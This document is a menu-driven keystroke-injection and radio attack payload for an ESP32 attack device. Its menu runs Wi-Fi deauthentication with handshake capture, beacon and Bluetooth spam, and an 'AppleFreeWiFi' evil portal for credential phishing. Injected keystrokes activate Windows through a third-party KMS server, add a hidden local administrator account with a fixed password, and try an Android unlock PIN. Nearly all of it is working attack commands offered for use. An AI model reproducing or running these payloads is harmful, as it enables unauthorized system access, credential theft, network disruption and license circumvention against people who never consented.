LED 250 100 100 128
DISPLAY_PNG /files/WiFi.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_PNG /select/WiFiok.png
DELAY 50
DISPLAY_PNG /files/WiFi.png
DELAY 50
DISPLAY_PNG /files/Rickroll.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. Rickroll...

ESP32M attack -t rickroll
DELAY 10000

DISPLAY_CLEAR
DISPLAY_PNG /files/Rickroll.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/Deauth.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. Deauth...

WEB_OFF
ESP32M scanap
DELAY 20000
DISPLAY_CLEAR
DISPLAY_PNG /files/Deauth.png
DISPLAY_TEXT 5 5 Deauthing >:]
ESP32M stopscan
ESP32M select -a all
ESP32M sniffpmkid -l -d
ESP32M sniffdeauth
DELAY 300000
REM *5 minutes*
DISPLAY_CLEAR
DISPLAY_PNG /files/Deauth.png
DISPLAY_TEXT 5 5 Done! Check SD

WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/WifiSpam.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. WifiSpam...

ESP32M attack -t beacon -r

DISPLAY_CLEAR
DISPLAY_PNG /files/WifiSpam.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/1exit.png
WAIT_FOR_BUTTON_PRESS
END_IF
ESP32M stopscan
DISPLAY_PNG /more/WiFinext.png
DELAY 60
DISPLAY_PNG /files/WiFi.png
DISPLAY_PNG /files/Bluetooth.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_PNG /select/Bluetoothok.png
DELAY 50
DISPLAY_PNG /files/Bluetooth.png
DELAY 50
DISPLAY_PNG /files/BtSpam.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. iSpam

ESP32M blespam -t all

DELAY 1000
DISPLAY_PNG /files/BtSpam.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/smSpam.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. smSpam

ESP32M blespam -t samsung

DELAY 1000
DISPLAY_PNG /files/smSpam.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/2exit.png
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /more/Bluetoothnext.png
DELAY 60
DISPLAY_PNG /files/Bluetooth.png
DISPLAY_PNG /files/Broadcasting.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_PNG /select/Broadcastingok.png
DELAY 50
DISPLAY_PNG /files/Broadcasting.png
DELAY 50
DISPLAY_PNG /files/Evilap.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. Evilap...

DELAY 1000
WEB_OFF
ESP32M ssid -a -n AppleFreeWiFi
ESP32M select -a 1
ESP32M evilportal -c start -w apple.html

DISPLAY_CLEAR
DISPLAY_PNG /files/Evilap.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/3exit.png
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /more/Broadcastingnext.png
DELAY 60
DISPLAY_PNG /files/Broadcasting.png

DISPLAY_PNG /files/Utilities.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_PNG /select/Utilitiesok.png
DELAY 50
DISPLAY_PNG /files/Utilities.png
DELAY 50
DISPLAY_PNG /files/Script1.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 HID Rickrolling

ESP32M stopscan
GUI r
DELAY 1000
STRING https://www.youtube.com/watch?v=xvFZjo5PgG0
DELAY 1000
ENTER

DISPLAY_PNG /files/Script1.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/Script2.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Hack XD...

GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
F11
STRING color 5
ENTER
STRING dir /s
ENTER

DELAY 1000
DISPLAY_PNG /files/Script2.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF

DISPLAY_PNG /files/Script3.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. Script3

REM

DELAY 1000
DISPLAY_PNG /files/Script3.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF

DISPLAY_PNG /files/4exit.png
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /more/Utilitiesnext.png
DELAY 60
DISPLAY_PNG /files/Utilities.png

DISPLAY_PNG /files/Windows.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_PNG /select/Windowsok.png
DELAY 50
DISPLAY_PNG /files/Windows.png
DELAY 50
DISPLAY_PNG /files/Windows1.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Activating!

GUI r
DELAY 1000
STRING cmd
DELAY 500
ENTER
DELAY 500
STRING slmgr /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 500
STRING slmgr /skms kms8.msguides.com
DELAY 500
ENTER
DELAY 500
ENTER
DELAY 500
STRING slmgr /ato
DELAY 500
ENTER
DELAY 500
ENTER

DISPLAY_PNG /files/Windows1.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/Windows2.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 AdminCrack...

GUI r
DELAY 1000
STRING powershell /Command "Start/Process powershell /Verb runAs"
DELAY 3000
ENTER
DELAY 1000
RAW_HID 0x50
DELAY 1000
RAW_HID 0x28
DELAY 500
STRING net user pentestlab P4ssword123
RAW_HID 0x2C
RAW_HID SHIFT 0x24
STRING add
ENTER
DELAY 1000
STRING net localgroup administrators pentestlab
RAW_HID 0x2C
RAW_HID SHIFT 0x24
STRING add
ENTER

DELAY 1000
DISPLAY_PNG /files/Windows2.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF

DISPLAY_PNG /files/Windows3.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Load. Win3...

REM

DELAY 1000
DISPLAY_PNG /files/Windows3.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF

DISPLAY_PNG /files/6exit.png
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /more/Windowsnext.png
DELAY 60
DISPLAY_PNG /files/Windows.png

DISPLAY_PNG /files/Android.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_PNG /select/Androidok.png
DELAY 50
DISPLAY_PNG /files/Android.png
DELAY 50
DISPLAY_PNG /files/Android1.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 U forgot? :]

SPACE
DELAY 1000
SPACE
DELAY 1000
STRING 1234

DISPLAY_PNG /files/Android1.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /files/Android2.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Andr2...

REM

DELAY 1000
DISPLAY_PNG /files/Android2.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF

DISPLAY_PNG /files/Android3.png
WAIT_FOR_BUTTON_PRESS
IF (BUTTON_LONG_PRESS())
DISPLAY_TEXT 5 5 Andr3...

REM

DELAY 1000
DISPLAY_PNG /files/Android3.png
DISPLAY_TEXT 5 5 Done!
WAIT_FOR_BUTTON_PRESS
END_IF

DISPLAY_PNG /files/7exit.png
WAIT_FOR_BUTTON_PRESS
END_IF
DISPLAY_PNG /more/Androidnext.png
DELAY 60
DISPLAY_PNG /files/Android.png

ESP32M stopscan
RESTART_PAYLOAD
